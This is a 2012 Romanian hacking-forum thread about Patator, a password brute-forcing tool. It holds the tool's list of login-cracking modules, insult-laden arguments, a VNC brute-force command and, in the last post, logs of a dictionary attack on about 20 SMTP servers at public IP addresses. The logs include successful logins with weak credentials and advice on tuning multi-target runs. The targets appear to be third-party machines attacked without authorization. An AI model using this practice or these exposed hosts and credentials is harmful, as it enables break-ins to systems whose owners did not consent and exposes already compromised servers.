denjacker Posted January 2, 2012 Report Posted January 2, 2012 (edited) There are many tools available for cracking like, ncrack, brutus and THE hydra but today I want to share patator. Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.Currently it supports the following modules:* ftp_login : Brute-force FTP* ssh_login : Brute-force SSH* telnet_login : Brute-force Telnet* smtp_login : Brute-force SMTP* smtp_vrfy : Enumerate valid users using the SMTP VRFY command* smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command* http_fuzz : Brute-force HTTP/HTTPS* pop_passd : Brute-force poppassd (not POP3)* ldap_login : Brute-force LDAP* smb_login : Brute-force SMB* mssql_login : Brute-force MSSQL* oracle_login : Brute-force Oracle* mysql_login : Brute-force MySQL* pgsql_login : Brute-force PostgreSQL* vnc_login : Brute-force VNC* dns_forward : Forward lookup subdomains* dns_reverse : Reverse lookup subnets* snmp_login : Brute-force SNMPv1/2 and SNMPv3* unzip_pass : Brute-force the password of encrypted ZIP files* keystore_pass : Brute-force the password of Java keystore filesThe name "Patator" comes from patator - YouTubePatator is NOT script-kiddie friendly, please read the README inside patator.py before reporting. DownloadFTP : Enumerate valid logins on a too verbose server HTTP : Brute-force phpMyAdmin logon SNMPv3 : Find valid usernames SNMPv3 : Find valid passwords DNS : Forward lookup DNS : Reverse lookup two netblocks owned by Google ZIP : Crack a password-protected ZIP file (older pkzip encryption not supported in JtR)SURSA :http://www.ehacking.net/2011/12/patator-multi-purpose-brute-forcing.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+ehacking+%28Ehacking-+Your+Way+To+The+World+Of+IT+Security%29 Edited January 2, 2012 by denjacker 1 Quote
securityfocus.eu Posted January 2, 2012 Report Posted January 2, 2012 (edited) ........................................... Edited January 2, 2012 by securityfocus.eu 1 Quote
SticKyWoX Posted January 2, 2012 Report Posted January 2, 2012 Salut,Prietene scuzama ca iti spun dar esti PRAF !C yaDe unde ai picat ma? Zi-ne si noua de ce crezi ca e praf.Multumesc, chiar aveam nevoie. Quote
denjacker Posted January 2, 2012 Author Report Posted January 2, 2012 Salut,Prietene scuza-ma ca iti spun dar esti PRAF !C yate scuz ..C ya Quote
securityfocus.eu Posted January 2, 2012 Report Posted January 2, 2012 Salut,Bruteforce Asa ii spui tu la un script de dictionary attack cand o sa se faca share la bruteforce de SSH..... Quote
aelius Posted January 2, 2012 Report Posted January 2, 2012 (edited) Salut,Prietene scuzama ca iti spun dar esti PRAF !C yaMa dute-n sloboz de labar notoriu, uita-te si tu la posturile omului si apoi vino aici sa ne dai noua cu mucii-n fasole. Edited January 2, 2012 by aelius Quote
SticKyWoX Posted January 2, 2012 Report Posted January 2, 2012 Salut,Bruteforce Asa ii spui tu la un script de dictionary attack cand o sa se faca share la bruteforce de SSH.....Citatul e luat direct din script. Nu el l-a scris. Quote
securityfocus.eu Posted January 2, 2012 Report Posted January 2, 2012 )Adevaru e ca metrosexuali ca tine care nu stiu sa vorbeasca intalnesc pe toate drumurile. Sa fi iubit si poate daca viitoare ai noroc mau mult in viata. Quote
securityfocus.eu Posted January 2, 2012 Report Posted January 2, 2012 Salut,Da te cred eu am dat reply la ce a scris el. Nu a scris sursa deunde a dat copy/paste.C ya. Quote
aelius Posted January 2, 2012 Report Posted January 2, 2012 )Adevaru e ca metrosexuali ca tine care nu stiu sa vorbeasca intalnesc pe toate drumurile. Sa fi iubit si poate daca viitoare ai noroc mau mult in viata.Tu stii, ai site-ul ala mai praf decat mamaie. Ai fiecare post in parte copy/paste, n-ai scris nici macar un tutorial. Pana si "link-urile" catre surse le-ai pus fara ancora, ca nu cumva sa iti strici page rank-ul sau sa dea cineva click din gresala. Quote
securityfocus.eu Posted January 2, 2012 Report Posted January 2, 2012 Tu stii, ai site-ul ala mai praf decat mamaie. Ai fiecare post in parte copy/paste, n-ai scris nici macar un tutorial. Pana si "link-urile" catre surse le-ai pus fara ancora, ca nu cumva sa iti strici page rank-ul sau sa dea cineva click din gresala.Prietenul meu. Am cateva tutoriale video nu multe pentru ca nu prea am avut timp sa fac. Daca tu imi spui ca sunt copy paste poate asa o fi nu te contrazic, dar dami PM deunde am dat paste. Cu situ iti dau dreptate nu stiu prea multe despre web design si nici nu cred ca o sa vreau sa invat vreodata pentru ca nu stau sa imi bat capu cu prostii.Sa fi iubit. Quote
denjacker Posted January 2, 2012 Author Report Posted January 2, 2012 There ... i fixed it! Am pus si sursa. Sunt chestii care mi se par mai interesante si le pun la "share" in speranta ca poate tie, tovaras de RST, poate-ti sunt de folos. Daca vrei sa te afirmi cumva si nu stii cum s-o faci , be smart somewhere else. Quote
securityfocus.eu Posted January 2, 2012 Report Posted January 2, 2012 There ... i fixed it! Am pus si sursa. Sunt chestii care mi se par mai interesante si le pun la "share" in speranta ca poate tie, tovaras de RST, poate-ti sunt de folos. Daca vrei sa te afirmi cumva si nu stii cum s-o faci , be smart somewhere else.Salut,Sincer sa fiu da te cred pot fi de folos nu zic nu. Dar ce face scriptu care lai pus face si Hydra si multe altele. Sincer nu imi place sa ma afirm.Nu o lua in nume de rau pentru commentul care lam facut. C ya Quote
aelius Posted January 2, 2012 Report Posted January 2, 2012 Password cracking - Wikipedia, the free encyclopedia"Brute-force cracking, in which a computer tries every possible key or password until it succeeds, is the lowest common denominator of password cracking. More common methods of password cracking, such as dictionary attacks, pattern checking, word list substitution, etc., attempt to reduce the number of trials required and will usually be attempted before brute force. Higher password bit strength increases exponentially the number of candidate passwords that must be checked, on average, to recover the password and reduces the likelihood that the password will be found in any cracking dictionary." Quote
securityfocus.eu Posted January 2, 2012 Report Posted January 2, 2012 Password cracking - Wikipedia, the free encyclopedia"Brute-force cracking, in which a computer tries every possible key or password until it succeeds, is the lowest common denominator of password cracking. More common methods of password cracking, such as dictionary attacks, pattern checking, word list substitution, etc., attempt to reduce the number of trials required and will usually be attempted before brute force. Higher password bit strength increases exponentially the number of candidate passwords that must be checked, on average, to recover the password and reduces the likelihood that the password will be found in any cracking dictionary."Salut,Brute-force attack nu e acelasi lucru cu dictionary attack si sti bine asta. Sa fi iubit ! Quote
denjacker Posted January 2, 2012 Author Report Posted January 2, 2012 Salut,Sincer sa fiu da te cred pot fi de folos nu zic nu. Dar ce face scriptu care lai pus face si Hydra si multe altele. Sincer nu imi place sa ma afirm.Nu o lua in nume de rau pentru commentul care lam facut. C yaJessus fingering Christ .... deci bun, te supara ca face si Hydra. Ok !! si din acest motiv eu sunt PRAF !!!111001!!.Prietene .. eu raman praf, si tu crezi ce vrei sa crezi. whatever Quote
securityfocus.eu Posted January 2, 2012 Report Posted January 2, 2012 Jessus fingering Christ .... deci bun, te supara ca face si Hydra. Ok !! si din acest motiv eu sunt PRAF !!!111001!!.Prietene .. eu raman praf, si tu crezi ce vrei sa crezi. whateverSalut,Intelegi cu totul gresit. Iti mai spun odata. Eu am dat comentul pentru ca:Nu am stiut ca tu ai dat copy/paste la descrierea scriptului pentru ca nu ai precizat sursa.Nu ma supara ca face ce face si Hydra si altele si tiam spus si iti repet nu o lua in nume de rau dar poate daca specificai sursa deunde ai dat copy/paste nu mai aveam discutia asta acuma.C ya Quote
SticKyWoX Posted January 2, 2012 Report Posted January 2, 2012 Salut,Intelegi cu totul gresit. Iti mai spun odata. Eu am dat comentul pentru ca:Nu am stiut ca tu ai dat copy/paste la descrierea scriptului pentru ca nu ai precizat sursa.Nu ma supara ca face ce face si Hydra si altele si tiam spus si iti repet nu o lua in nume de rau dar poate daca specificai sursa deunde ai dat copy/paste nu mai aveam discutia asta acuma.C ya Oare si-a dat seama ca nu vorbeste prin PM?Ce pot sa zic, te contrazici singur. Quote
securityfocus.eu Posted January 2, 2012 Report Posted January 2, 2012 (edited) Oare si-a dat seama ca nu vorbeste prin PM?Ce pot sa zic, te contrazici singur.Salut,Okay e parerea ta si o respect dar cum am mai spus daca postul avea sursa nu ajungeam la discutiile acestea, plus, hai sa fim seriosi si sa vorbim frumos fara injuraturi ca nu suntem copiii de pe Facebook....Sa fi iubit! Edited January 2, 2012 by securityfocus.eu Quote
adonisslanic Posted January 5, 2012 Report Posted January 5, 2012 python patator_v0.3.py vnc_login host=127.0.0.1 password=FILE0 0=pass.txteroarea este patator WARNING - xxx | 12345 | 1 | <type 'exceptions.ValueError'>, ('Input strings must be a multiple of 8 in length',)How the fuck do i solve this O_O Quote
mandeamarian Posted January 6, 2012 Report Posted January 6, 2012 Ma bag si "yo" ca musca-n lapte dar totusi intreb: Nu-i acelasi care l-a postat si Nytro pe 29.12.2011 ? Quote
Nytro Posted January 6, 2012 Report Posted January 6, 2012 E o versiune ceva mai noua parca cu o alta prezentare. Quote
hKr Posted January 12, 2012 Report Posted January 12, 2012 Am testat acest Bruteforce, mai bine spus "Dictionary attack" si pe un singur target cu multi theard merge fara probleme si pe deasupra repede dar pe mai multe targete+theaduri deodata nu mai da randament.Testat pe modulu "smtp_login", multi target(ip,user,password=LIST) + multi theard pe o lista de vreo 20 smtp-uri vulnerabile si verificate inainte de a le baga in "Petator Dictionary attack".Mai jos observam 3 servere de smtp la care a reusit autentificarea cu succes, 1 nereusit, 1 fail si 2 erori care apar incontinu.05:55:59 patator INFO - 235 25 | 173.9.86.81:test:password | 13 | Authentication successful05:55:59 patator INFO - 235 32 | 71.146.247.179:test:password | 28 | 2.7.0 Authentication successful.05:56:02 patator INFO - 235 32 | 79.123.90.202:test:password | 34 | 2.7.0 Authentication successful.05:56:08 patator INFO - 535 34 | test:admin:173.63.47.19 |123 | 5.7.3 Authentication unsuccessful.05:56:50 patator INFO - 535 28 | test:admin:99.89.25.201 | 136 | Error: authentication failed05:56:50 patator INFO - 535 12 | 173.165.33.109:test:password | 7 | auth failure05:60:30 patator WARNING - xxx | 123.2.170.205:test:password | 1 | <class 'socket.error'>, (110, 'Connection timed out')05:60:30 patator WARNING - xxx | 87.224.82.83:test:password | 37 | <type 'exceptions.ValueError'>, ('need more than 1 value to unpack',)Nu am pus toata activitatea de la Petator ce s-a desfasurat in timpul atackului deoarece nu are rost, am pus doar ce m-a intersat si este important.Hai sa comentam de exemplu eroarea cu socket.Eroarea 1: Connection timed out. = <class 'socket.error'>, (110, 'Connection timed out')A connection attempt failed because the connected party did not properly respond after a period of time, or the established connection failed because the connected host has failed to respond.Daca nu a reusit stabilirea conexiunii(conectarea pe acel port) din motive diferite, cum ar fi:- a) Smtp Server(port) oprit- Port-ul este blockat- c) Ip-ul este down- Etc. ar fi trebuit sa dea eroarea "auth failure" finca setarea este --failure-delay=10 --max-retries=1 iar smtp-ul functioneaza- Am testat cu un singur target(tot acelasi ip 123.2.170.205) care a primit eroarea de mai sus despre care vorbim si ce sa vedem ? A disparut eroarea cu socket si am primit eroarea cu "auth failure" cum este normal. Daca dam atack pe multi target primim erori.- Observam 1 singur target fara acele erori cu socket.07:03:24 patator INFO - 535 12 | test:smtp:173.165.33.109 | 1 | auth failure07:03:26 patator INFO - 535 12 | test:support:173.165.33.109 | 3 | auth failure07:03:26 patator INFO - 535 12 | test:staff:173.165.33.109 | 2 | auth failure07:03:28 patator INFO - 535 12 | test:password:173.165.33.109 | 6 | auth failure07:03:31 patator INFO - 535 12 | test:test:173.165.33.109 | 7 | auth failure07:03:36 patator INFO - 535 12 | test:backup:173.165.33.109 | 4 | auth failure07:03:36 patator INFO - 535 12 | test:admin:173.165.33.109 | 8 | auth failure07:03:41 patator INFO - 535 12 | test:sales:173.165.33.109 | 5 | auth failureEroarea 2: <type 'exceptions.ValueError'>, ('need more than 1 value to unpack',)Nu are rost sa mai vorbesc despre aceasta eroare si nici nu as avea ce sa spun in privinta ei.Sa punem varianta ca l-au scris gresit si au fost informati despre erorile care provin cand folosim "multi target" dar inca nu le-au rezolvat.Daca trecem cu vederea peste acele erori, tot ramane varianta ca, face atack incredibil de greu pe mai multe targete deodata.51 secunde a durat pe 1 singur target cu 1 user si 8 parole. Setat=--failure-delay=0.2 --max-retries=1.Pare a nu functiuna, lua in calcul setarea "--failure-delay=secunde".07:23:35 patator INFO - Starting Patator v0.3 (http://code.google.com/p/patator/) at 2012-01-12 07:23 EET07:23:35 patator INFO - 07:23:35 patator INFO - code & size | candidate | num | mesg07:23:35 patator INFO - ---------------------------------------------------------------07:24:18 patator INFO - 535 12 | test:test:173.165.33.109 | 7 | auth failure07:24:19 patator INFO - 535 12 | test:admin:173.165.33.109 | 8 | auth failure07:24:19 patator INFO - 535 12 | test:support:173.165.33.109 | 3 | auth failure07:24:20 patator INFO - 535 12 | test:backup:173.165.33.109 | 4 | auth failure07:24:22 patator INFO - 535 12 | test:staff:173.165.33.109 | 2 | auth failure07:24:24 patator INFO - 535 12 | test:password:173.165.33.109 | 6 | auth failure07:24:25 patator INFO - 535 12 | test:smtp:173.165.33.109 | 1 | auth failure07:24:26 patator INFO - 535 12 | test:sales:173.165.33.109 | 5 | auth failure07:24:26 patator INFO - Hits/Done/Size/Fail: 8/8/8/0, Avg: 0 r/s, Time: 0h 0m [color=red]51s[/color]De aici va dati si voi seama ca nu merita sa faci brute pe multi target atata timp cat pe 1 singur target cu 1 user si 8 parole dureaza 1 min.Astept si parerile voastre cei care l-au testat "multi target+theard-uri" ce rezultat ati capatat.In legatura cu "THC-Hydra" tot pe modulu de smtp si "multi target+theard-uri" are ca rezultat tot un esec ca si acest "Petator - Dictionary attack".Sunt foarte bine gandite si scrise dar mai putin la partea de multi target. 1 Quote